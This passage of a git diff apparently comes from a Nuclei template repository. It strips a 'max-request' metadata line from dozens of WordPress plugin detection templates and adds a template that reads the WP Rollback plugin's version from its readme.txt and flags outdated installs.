b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: - max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 648ee176ce..656ad7dfe5 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: - max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7836d9554c..015fb97043 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: - max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index ccd72e427a..1d5224b457 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: - max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3622b2c6b3..aafd6c6a38 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: - max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 9eff765d61..e10ab985da 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: - max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index c856e1fa9e..9881b591ae 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: - max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 008440cc58..0480b4b0e6 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: - max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 410776862f..26d525386b 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: - max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index f210a2a2f9..3920c5cf56 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: - max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f1dd1bf150..f556786f5a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: - max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index a9ec913599..844e3d19a0 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: - max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index d38aeb0279..eb0f02f602 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: - max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 07c43b9d80..755efd53fa 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: - max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 83a849e11e..0403bb4e72 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: - max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index c6100637d9..cd2632ea05 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: - max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 1f188b66c6..b5f8b822c7 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: - max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 2c7b16cb44..85aaf7ff16 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: - max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 9d6afa8d3f..0af322b728 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: - max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 48481fde3b..b7ad16e281 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: - max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index b34d196268..10fd071b0b 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: - max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index abec174ec3..401b0e479f 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: - max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index e088ac07a6..6f95506748 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: - max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 8b163200bf..4404f87aab 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: - max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 2366a7dad7..8995434fce 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: - max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 71448e61e8..8175806cb8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: - max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 717554b89f..db82bc7f43 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: - max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index fba5c8b09c..03ddae57bc 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: - max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 631202198e..d6449bb5bf 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: - max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index cc953078eb..2d5fdf1779 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: - max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 97ce674116..6b5705e20d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: - max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index 6d05a6f058..dbcdb64bad 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index baf5af3bb5..fb9ea502ce 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 54dce49b42..1d41b4ec2c 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 5fae796fdd..4fa6fc3ffe 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 22f812e2b8..1c1c690fcd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: - max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index c637006d26..4d6702d81a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: - max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index e020507ccb..42cb8bc409 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: - max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index c92903fd79..55d6effbf5 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: - max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index c25b2c1c48..6786cab703 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: - max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 4d6dd14d25..784ba22c8a 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: - max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 7ca0870ed6..72ff55e58a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: - max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 4f0d9be568..8cfaa0f5a9 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: - max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index f3c481b824..85900a01a7 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: - max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index ba214fd7ea..a7ccde0b49 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: - max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 8f5fe8d9a5..422664a98c 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: - max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 0458b13354..f0af3a748a 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: - max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index d570be07bf..f89f1a20b3 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: - max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index ee05e3add8..01fb12d0ad 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: - max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index df2487955f..1773857e15 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: - max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 79ff01211c..bcd1509c68 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: - max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 23414b3d1d..c6aca20a60 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: - max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml new file mode 100644 index 0000000000..810fc82cde --- /dev/null +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -0,0 +1,49 @@ +id: wordpress-wp-rollback + +info: + name: WP Rollback Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/wp-rollback/ + metadata: + plugin_namespace: wp-rollback + wpscan: https://wpscan.com/plugin/wp-rollback + tags: tech,wordpress,wp-plugin,top-200 + +http: + - method: GET + + path: + - "{{BaseURL}}/wp-content/plugins/wp-rollback/readme.txt" + + payloads: + last_version: helpers/wordpress/plugins/wp-rollback.txt + + extractors: + - type: regex + part: body + internal: true + name: internal_detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a04ddc6003..783d381ed8 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: - max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 2ead906817..8bdc600063 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ 